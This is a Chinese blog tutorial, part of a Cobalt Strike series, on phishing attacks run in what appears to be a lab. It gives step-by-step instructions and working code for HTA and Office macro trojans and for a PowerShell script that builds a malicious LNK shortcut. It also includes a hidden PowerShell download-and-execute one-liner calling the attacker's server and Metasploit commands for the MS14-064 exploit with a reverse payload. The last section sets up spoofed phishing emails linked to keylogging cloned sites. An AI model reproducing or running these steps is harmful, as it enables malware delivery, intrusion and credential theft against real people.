内网渗透神器CobaltStrike之钓鱼攻击(六)

已于 2023-08-21 21:34:40 修改
阅读量2.5k 收藏 20
点赞数 3
分类专栏: 红队的自我修养 文章标签: 网络安全 web安全 渗透测试
于 2022-11-22 16:52:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/127985894
版权

一、HTA木马

简介

HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,它具有桌面程序的所有权限。就是一个html应用程序,双击就能运行

HTA木马一般配合网站克隆进行钓鱼攻击


步骤

生成HTML后门(HTA文件), 选择相应的监听器和模式,有三种模式,分别为PowershellVBAExecutable

Executable 将会在hta文件中内嵌一个PE文件
Powershell 将会在hta文件中内嵌一段Powershell代码
VBA 将会在hta文件中内嵌一段VBA代码

image-20221006215055595

image-20221006215143328

image-20221006220530926


将hta木马上传至服务器提供给用户下载, 返回木马的url路径

image-20221006225053815

image-20221006225147120


自行选择一个网站进行克隆, 并在attack选项处选择上传的HTA木马, 随后返回的钓鱼链接http://192.168.47.134:80/

image-20221006225540887

动画


受害机用浏览器访问钓鱼链接后, 网站会咨询用户是否下载木马文件, 若用户下载且运行, 则用户在CS上线

动画


二、Office宏木马

简介

office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行


步骤

首先安装wps的宏插件, 不然无法在wps文档插入宏代码

image-20221006210722868


在攻击选项选择MS Office Macro生成恶意宏代码

img

img


打开新建的doc文档, 在开发工具栏点击宏选项, 新建一个宏

img


将CS生成的宏代码复制至文档中, 然后将文件类型保存为docm类型

img

img


三、LINK钓鱼

简介

lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令

例如创建一个简单的powershell文件, 先创建一个txt文件, 并对其写入如下代码, 随后将其后缀名改为ps1, 右键单击此文件选择powershell执行, 运行后会弹出计算器

cmd /c calc.exe

1


步骤

选择钓鱼攻击>Scripted Web Delivery, 生成PowerShell远程执行代码

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"

image-20221008093244770

image-20221008093510210


按照上面做的简单powershell步骤,将其内容里的calc.exe换成powershell代码, 保存为test.txt文件

cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"

image-20221008094547272


创建LNK.ps1文件, 将如下代码写入进去, 然后右键powershell执行后, 会在文件当前目录下生成test.lnk文件

若受害机运行了test.lnk文件, 则在CS上线

注意:LNK.ps1和test.txt要在同一目录下

$file = Get-Content "test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ''+ $file
$Shortcut.Save()

四、OLE远程代码执行(MS14-064)

简介

Microsoft Windows OLE 远程代码执行漏洞,影响Win95+IE3 - Win10+IE11全版本

通过MSF生成恶意url连接, 配合CS克隆网站进行钓鱼攻击, 然后受害机在CS上线


准备环境

主机描述
192.168.47.134(kali)CS服务器
192.168.47.144(kali)MSF
192.168.47.133(win7)CS客户端,攻击机
192.168.47.141(win7)受害机

步骤

在kali上输入msfconsole打开metasploit, 再输入use exploit/windows/browser/ms14_064_ole_code_execution选择相应模块

然后输入如下命令开始执行攻击, 随后会返回一个url钓鱼连接:http://192.168.47.144:8080/lCKUuRHyz1

set srvhost 192.168.47.144 //设置msf服务器的ip

set srvport 8080  //设置恶意连接的访问端口

set payload windows/meterpreter/reverse_http  //设置监听协议

set allowpowershellprompt true  //使用powershell执行代码

set lhost 192.168.47.134  //设置监听服务器的ip

set lport 80  //设置监听服务器的端口

run  //开始执行

image-20221007163250674


在CS生成克隆网站, 攻击选项处填写刚生成的url钓鱼链接, 生成的克隆网站链接为http://192.168.47.134:80/baidu

image-20221007164045381

image-20221007164105955


受害机访问克隆网站后会弹出警告框, 询问你是否允许执行powershell, 若点击允许则在CS成功上线

2

image-20221007164633910


五、钓鱼邮件

简介

利用Cobalt Strike生成钓鱼邮件对企业或者网站的邮箱进行攻击, 钓鱼邮件的内容通常包含Office宏木马附件, 钓鱼网站等等

Cobalt Strike钓鱼邮件攻击需确定如下信息:

  • 目标邮箱
  • 邮件模板
  • smtp账号

步骤

首先确保你邮箱开启了SMTP服务,这里我以163邮箱为例, 需开启POP3/SMTP服务

1


开启了smtp服务后会自动生成一个授权密码, 在后面CS填写smtp信息会用到

image-20221007231641595


在网页邮箱可以查看邮件的模板, 将模板内容保存至Mail Template.txt文件

image-20221007232822248

image-20221007232952769


将目标邮箱以及收件人的信息保存在Mail.txt文件, 注意这两者之间相隔一个tab键的距离

image-20221007233150078


CS攻击选择邮件钓鱼

image-20221007233256046


填写钓鱼攻击所需的信息,在Mail Server的密码框要填写上面开启SMTP服务所生成的授权密码, 填写完毕后点击Send发送邮件

image-20221007234047285

Targets:存有目标邮箱及收件人信息的文本文件

Template:邮件模板文件

Attachment:附件

Embed URL:填写url钓鱼链接, 可将邮件的内置链接替换掉。此处我填写了带有键盘记录功能的克隆网站

Mail Server: 邮箱服务器相关信息

Bounce to:邮箱地址


接收到的钓鱼邮件显示的发件人是和原邮件一模一样的,且邮件的链接都被替换成了钓鱼链接

3


点击链接跳转至钓鱼页面,在输入框输入内容会被传输至CS服务器,可在CS客户端打开Web日志进行查看键盘记录

1

1

Henry404s
关注
  • 3
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透-cs钓鱼测试攻击
lza20001103的博客
05-08 2995
cs之模拟钓鱼攻击
154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]
qwsn
03-26 3926
一、钓鱼攻击和鱼叉钓鱼简介 1、钓鱼攻击简介 2、钓鱼攻击模块:6个 3、鱼叉钓鱼简介 4、鱼叉钓鱼示例:邮件钓鱼 二、钓鱼攻击测试 1、测试环境 2、System Profiler(信息搜集) 3、Clone Site(克隆网站):获取键盘记录 4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话 5、MSF溢出代码+CS克隆网站钓鱼攻击获取MSF会话 三、鱼叉钓鱼测试 1、邮件钓鱼
CobaltStrike windows木马原理分析
好好学习,天天向上
12-28 1080
本文主要介绍CobaltStrike windows型木马的原理,同Meterpreter大体类似。不同之处有使用了命名管道,使用了http的相关api来下载payload,同样使用的peb来获取api的地址,最后的后门是一个反射型dll。
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
二次元怪兽的博客
08-07 720
默认会有一个已经建立的好的监听配置我们可以修改它 或者添加一个新的监听配置。
Cobalt-Strike-4.5
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 Cobalt Strike 分为客户端组件和服务器组件。 服务器组件,也就是团队服务器,是 Beacon payload 的 控制器,也是 Cobalt Strike 社会工程功能的托管主机。团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录。 客户端组件:客户端团队成员使用的图形化界面
Cobalt Strike网站克隆
浅笑996的博客
11-16 3936
点击 attack --> Web-dirve-by --> clone file 填写你要克隆网站。带有端口 Clone URL:克隆目标网站的URL 注意问题:URL需要添加http协议和端口(80) Local URL:本地克隆路径 Local Host:本地主机IP Local Port:本地端口 Attack:克隆后目标网站执行脚本,如:flash漏洞 克隆成功 ...
生成克隆钓鱼网站与对win7进行后渗透操作
weixin_72543266的博客
09-10 968
本篇文章是对自己使用CS部署钓鱼网站和通过生成木马对win7进行后渗透操作的一次实战,通过实战来去熟悉一些渗透测试过程中会遇到的一些操作,为自己以后的学习打好基础,也能去了解更多其他方面的一些知识.本文章是继上次进行手机木马远控复现后,进行钓鱼网站的搭建和使用木马文件后渗透的实操,在进行实战过程中遇到过,无法打开CS工具,也遇到过生成的木马文件在root文件夹中无法取出,说到达自己还是实战经验不足,但自己总能在遇到问题后冷静分析,并自己主动去解决问题,我很庆幸自己有这个能力,自己喜欢去依赖他人去解决问题,虽
HTA(html应用程序)攻击
Zlirving_的博客
02-23 3568
HTA 介绍 HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别 大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的 HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等) HTA
一次偶然的CobaltStrike木马钓鱼邮件分析
博客地址 www.sec0nd.top
08-02 1977
前几天看到一篇关于近期钓鱼邮件的情况统计的文章,挺有意思然后在逛某威胁感知社区的时候,看到了一个恶意url,也挺有意思子域名伪装成某安全公司hhh,然后看了下与之有关的通信样本好家伙全是钓鱼文件,免杀做的还不错,最近几天不知道为什么异常频繁于是就点进去几个看了看,分析分析这种是怎么实现cs上线的(纯小白,勿喷) 下面所有分析均为在线沙箱进行测试的结果。......
网络安全入门学习练手——CS伪装钓鱼网站
p36273的博客
05-19 1351
输入账号密码后,点击登录,会自动刷新跳回原来的登录页面,这个可能是CS平台自带的机制,不清楚的还以为是密码不正确导致登录失败呢。这时候就是可以随时监听钓鱼网站,而不用每次都得克隆网址了。Cobalt Strike平台(CS
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 Cobalt Strike 分为客户端组件和服务器组件。 服务器组件,也就是团队服务器,是 Beacon payload 的 控制器,也是 Cobalt Strike 社会工程功能的托管主机。团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录。 客户端组件:客户端团队成员使用的图形化界面
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start.sh 3、启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接) ./teamserver 192.168.11.11 123456 4、启动cs的客户端 ./start.sh 如果出现以下报错,说明jdk有问题 Exception in thread "main" java.lang.UnsatisfiedLinkError: Can't load library: /usr/lib/jvm/java-11-openjdk-amd64/lib/libawt_xawt.so 5、重新安装jdk解决以上问题 sudo apt install openjdk-11-jdk -y 6、再次启动c
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
内网渗透神器fscan扫描工具
12-04
Windows下安装fscan扫描工具下载go环境;...go build -ldflags使用说明简单用法fscan.exe -h 192.168.1.1/24 (默认使用全部模块)fscan.exe -h 192.168.1.1/16 (B段扫描)其他用法fscan.exe -h 192.168.1.1/24 -np -no -...
CS4.9.1.1-CobaltStrike4.9.1.1版
01-18
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全安全事件管理处置 — 安全事件处置思路指导
享你所想
04-26 718
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全与密码学
最新发布
weixin_61074128的博客
04-27 1237
一、密码学是一门研究信息安全保密的学科,主要涉及对信息进行加密、解密以及相关的安全技术和理论。它通过使用各种加密算法和技术,将明文信息转换为密文,以确保信息在传输和存储过程中的保密性、完整性和真实性。密码学在通信、电子商务、金融、军事等领域都有着广泛的应用。密码学包括对称加密、非对称加密、哈希函数、数字签名等重要内容。同时,密码学也在不断发展和创新,以应对不断变化的安全挑战。大家要注意的是我们平时用来认证身份的密码(passwd)翻译成口令更准确。
网络安全思考题
weixin_62304542的博客
04-27 772
网络安全渗透思考题
cobalt strike4.4
11-08
Cobalt Strike 4.4是一款专业的渗透测试工具,由Strategic Cyber LLC开发。它广泛被安全研究人员、红队和渗透测试人员使用,以评估网络安全的弱点和漏洞。 Cobalt Strike 4.4提供了各种功能和技术,包括钓鱼攻击、漏洞利用、社会工程学攻击内网渗透等。它模拟了真实的攻击场景,能够帮助安全专家发现和修复网络中的安全问题。 其中,钓鱼攻击Cobalt Strike 4.4的一个重要特性。它通过伪造电子邮件、网站和文件,诱使用户输入敏感信息,例如用户名、密码和信用卡信息。这可用于测试员评估目标组织员工的安全意识和行为。 Cobalt Strike 4.4还支持漏洞利用,用于发现和利用系统和应用程序的漏洞。这些漏洞可能导致入侵者获取未授权的访问权限,从而进一步探索和操纵目标网络。 社会工程学攻击是利用人的弱点和错误来获得机密信息的手段。Cobalt Strike 4.4中的社会工程学攻击模块可通过发送钓鱼电子邮件、制造假网站和执行欺骗性操作,诱使目标用户泄露敏感信息。 内网渗透Cobalt Strike 4.4的另一个重要功能。它模拟渗透攻击者在目标网络中的行为,尝试获取横向权限并访问受限资源。通过内网渗透渗透测试人员可以评估网络安全的脆弱点,并提出相应的解决方案来提高网络的防御能力。 总之,Cobalt Strike 4.4是一款功能强大的渗透测试工具,具有广泛的应用领域。它通过模拟攻击场景,帮助安全专家评估和提高网络安全性,保护组织免受潜在的网络攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值